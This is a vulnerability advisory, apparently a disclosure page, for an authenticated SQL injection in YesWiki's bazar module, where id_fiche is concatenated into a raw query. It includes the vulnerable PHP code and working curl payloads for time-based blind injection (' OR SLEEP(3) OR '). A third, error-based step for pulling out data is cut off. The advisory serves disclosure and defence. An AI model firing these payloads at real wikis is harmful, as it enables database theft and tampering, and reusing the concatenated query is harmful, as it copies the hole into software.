YesWiki bazar module contains a SQL injection vulnerability in tools/bazar/services/EntryManager.php at line 704. The $data['id_fiche'] value (sourced from $_POST['id_fiche']) is concatenated directly into a raw SQL query without any sanitization or parameterization.
Vulnerable Code (EntryManager.php:704):
$result = $this->dbService->loadSingle(
'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') .
"WHERE tag='" . $data['id_fiche'] . "'"
);
Attack Path:
acl:{"+"})/api/entries/{formId} with id_fiche=' OR SLEEP(3) OR 'ApiController::createEntry() checks isEntry($_POST['id_fiche']) → false (not existing entry) → calls create()create() → formatDataBeforeSave() → SQL injection at line 704dbService->loadSingle() passes raw string to mysqli_query() with no escaping. The escape() method exists but is NOT called here.
Docker PoC confirmation:
SELECT MIN(time) as firsttime FROM wiki_pages WHERE tag='TestEntry' → 2024-01-01 00:00:00WHERE tag='' OR SLEEP(3) OR '' → elapsed: 3.00s (SLEEP confirmed)Prerequisites: Any authenticated user account on a YesWiki instance with a bazar form (id_typeannonce) created.
Step 1 – Obtain session cookie (standard login via web UI or API)
Step 2 – Time-based blind SQLi (confirm vulnerability):
curl -s -X POST 'http://TARGET/?api/entries/1' \
-H 'Cookie: wikini_session=<SESSION>' \
-d "antispam=1&bf_titre=TestTitle&id_fiche=' OR SLEEP(3) OR '"
→ Response delays ~3 seconds confirming SQL injection.
Step 3 – Error-based SQLi (version exfil):
curl -s -X POST 'http://TARGET/?api/entries/1' \
-H 'Cookie: wikini_session=<SESSION>' \
-d "antispam=1&bf_titre=TestTitle&id_fiche=' AND...
4.6.1Exploitability
AV:NAC:LPR:LUI:NScope
S:UImpact
C:HI:HA:H8.8/CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H